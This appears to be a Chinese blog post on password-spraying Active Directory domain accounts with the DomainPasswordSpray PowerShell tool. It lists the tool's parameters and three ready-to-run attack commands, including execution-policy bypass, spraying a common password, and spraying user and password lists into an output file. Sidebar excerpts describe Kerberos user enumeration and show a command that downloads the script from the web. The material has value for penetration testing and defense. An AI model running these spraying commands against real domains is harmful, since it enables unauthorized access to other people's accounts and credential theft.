域用户爆破(DomainPasswordSpray)

已于 2024-01-11 16:32:41 修改
阅读量2.3k 收藏 1
点赞数 3
分类专栏: 内网渗透 文章标签: 域用户 爆破 内网渗透
于 2020-03-03 21:20:16 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104641780
版权

0x01 介绍

地址:DomainPasswordSpray

UserList          - Optional UserList parameter. This will be generated automatically if not specified.
Password          - A single password that will be used to perform the password spray.
PasswordList      - A list of passwords one per line to use for the password spray (Be very careful not to lockout accounts).
OutFile           - A file to output the results to.
Domain            - A domain to spray against.
Force             - Forces the spray to continue without prompting for confirmation.

在这里插入图片描述

0x02 实践

用法一:

自动从当前用户的域中生成用户列表,并尝试使用每个用户名和密码Admin12345进行身份验证

powershell -exec bypass
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Admin12345

在这里插入图片描述

用法二:

指定用户列表,指定单个密码进行爆破。

Invoke-DomainPasswordSpray -Userlist user.txt -Domain 0day -password Admin12345

在这里插入图片描述

用法三:

指定用户、密码列表进行爆破,输出到特定文件中。

Invoke-DomainPasswordSpray -Userlist user.txt -Domain 0day -PasswordList .\pass.txt -OutFile 1.txt

爆破成功结果:
在这里插入图片描述

LQxdp
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
渗透—用户枚举与口令爆破
越努力 越自由
03-24 4382
Kerberos本身是一种基于身份认证的协议,在 Kerberos 协议认证的 第一阶段AS-REQ ,当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击。
用户枚举和密码喷洒攻击(Password Spraying)
谢公子的博客
04-28 4194
目录 用户枚举 密码喷洒攻击 在 Kerberos 协议认证的 AS-REQ阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击 用户枚举 当主机不在内时,我们可以通过用户枚举来探测内的用户。我们可以使用nmap指定脚本来探测。 nmap ...
用户枚举与内密码喷洒
qq_18811919的博客
02-26 813
用户枚举与内密码喷洒讲解了4种工具的使用
DomainPasswordSpray:DomainPasswordSpray是用PowerShell编写的工具,用于对用户执行密码喷雾攻击。 默认情况下,它将自动从中生成用户列表。 请务必不要锁定帐户!
05-01
DomainPasswordSpray DomainPasswordSpray是用PowerShell编写的工具,用于对用户执行密码喷雾攻击。 默认情况下,它将自动从中生成用户列表。 请务必不要锁定帐户! 快速入门指南 使用“ powershell.exe -exec旁路”从Windows命令行打开PowerShell终端。 键入“导入模块DomainPasswordSpray.ps1”。 进行密码喷雾的唯一必要选择是-Password(单个密码)或-PasswordList(密码列表)以尝试多次喷雾。 使用-PasswordList选项时,Invoke-DomainPasswordSpray将尝试从中收集帐户锁定观察窗口,并将每个观察窗口的喷雾限制为一个,以避免锁定帐户。 以下命令将自动从当前用户中生成用户列表,并尝试使用每个用户名和密码Spring2017进行身份验证
密码喷洒实现
热门推荐
Shanfenglan's blog
10-27 9万+
密码喷洒 利用一个powershell工具完成DomainPasswordSpray 利用工具:DomainPasswordSpray 命令 下载工具 curl https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 > C:\Users\Administrator\Desktop\1.ps1 powershell (new-object System.Net.W
渗透之密码喷洒攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 1727
在实际渗透中,许多渗透测试人员和攻击者通常都会使用一种被称为 “密码喷洒”(Password Spraying)的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除帐户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,是用固定的密码去跑用户名。
Burp爆破Burp爆破 常用用户名字典
03-22
简单学习使用的Burp爆破 常用 常见 用户名字典
Ladon6.0新增密码嗅探、IIS密码读取、LDAP密码爆破
K8哥哥
12-26 1500
Ladon6.0 新增FTP/HTTP密码嗅探、IIS密码读取、LDAP密码爆破、 进程详细信息获取、渗透相关信息获取、命令行参数信息 操作系统识别、Wmi密码爆破、Smb密码爆破等功能优化 更新日志 动作 模块 说明 新增 LdapScan AD密码爆破:基于Ldap协议爆破Windows密码 新增 FtpSniffer/SnifferFtp Ftp密码嗅探(无需WinP...
高频常用爆破用户名字典和密码字典、WiFi字典
01-28
在IT安全领,尤其是网络运维工作中,理解和使用“高频常用爆破用户名字典和密码字典、WiFi字典”是至关重要的。这些工具通常用于测试系统安全性和防范潜在的攻击,例如SSH(Secure Shell)服务的弱口令爆破。 SSH...
常用爆破用户名字典top500
最新发布
05-29
常用爆破用户名字典top500,爆破字典中常用的用户名,用户名数量不多,但都是使用频率较高的。
管理员密码破解
05-26
管理员密码破解
用户弱口令检(po)测(jie)工具
02-07
用户弱口令检(po)测(jie)工具,非常实用,测试可用,帮助扫描弱口令
内网安全之内密码喷洒
weixin_45910629的博客
04-06 1057
内密码喷洒一般和用户名枚举一起使用,可以在无内凭据的情况下,通过枚举出内存在的用户名,进而对内存在的用户名进行密码喷洒,以此来获得内有效凭据。在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。这种针对所有用户的自动密码猜测通常是为了避免账户被锁定,因为如果目标设置了用户锁定策略的话,针对同一个用户的连续密码猜测会导致账户被锁定。
内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和用户枚举横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-17 588
正常用户登录主机,我们可以通过 "net user /domain"来列举出内的用户。但是当我们用非用户进行登录时,是不能使用 "net user /domain"这条命令的。或者当主机不在内但是能与控通信时,以上两种情况我们可以通过以下方法对用户进行枚举。
内渗透基本技巧
weixin_30700099的博客
08-18 173
0x00 什么是 有人说是一种组织结构,是个安全边界。也有另为一个名字,“活动目录”。不管是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为就是建立在计算机上的。加入里的计算机,共享文件,共享上网就会很方便。 里有个比较重要的角色,控制器(DC)。它有至高无上的权限,它可以在里对其他计算机(DA)胡作非为。控制器...
账户的几种攻击方式
Adminxe的博客
03-06 346
账户的几种攻击方式 0x01 Pre-Authentication 适用于在外的时候,对内的用户名进行枚举。利用Kerberos pre-auth的特性,在AS-REP中: 如果进行请求的用户存在,error-code为:ERR-PREAUTH-REQUIRED 如果请求的用户不存在,error-code
[内网渗透]—外向内信息收集、密码喷洒
Sentiment的博客
12-16 1490
当我们与目标内网建立了socks5隧道后,就可以从外对内机器进行信息搜集了,很多工具不用上传到目标机器,也就不易被AV检测到,但是有可能会被一些流量检测设备发现有大量socks5流量。接下来介绍下如何通过外对内进⾏更深的信息搜集:枚举⽤户、查看内⽤户、查看内组、查看内机器列表…LDAP(轻量⽬录访问协议),是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来
github里的默认_渗透基础——用户的密码永不过期属性
weixin_39668571的博客
11-22 478
0x00 前言在环境中,用户的凭据是十分重要的信息。为了增强安全性,组策略会设置所有用户口令的最长有效时间,到达过期时间后强制用户更改口令。在实际环境中,有些用户需要设置为密码永不过期,这可以通过添加密码永不过期属性来实现。在渗透中,我们需要枚举出具有密码永不过期属性的用户,也需要能够将某个用户设置为密码永不过期。相对的站在防御角度,我们需要尽可能减少具有密码永不过期属性...
红队技巧-渗透的协议利用
qq_50854662的博客
03-27 1787
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了ua...
复杂环境山体爆破安全控制技术应用
文章介绍了如何结合浅孔和中深孔爆破技术,以及利用孔外延时爆破技术来增大爆破规模和降低爆破频率,同时通过现场爆破振动监测来解决安全问题。这个施工方案对于类似的城市石方爆破工程具有参考价值。" 在城市或...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值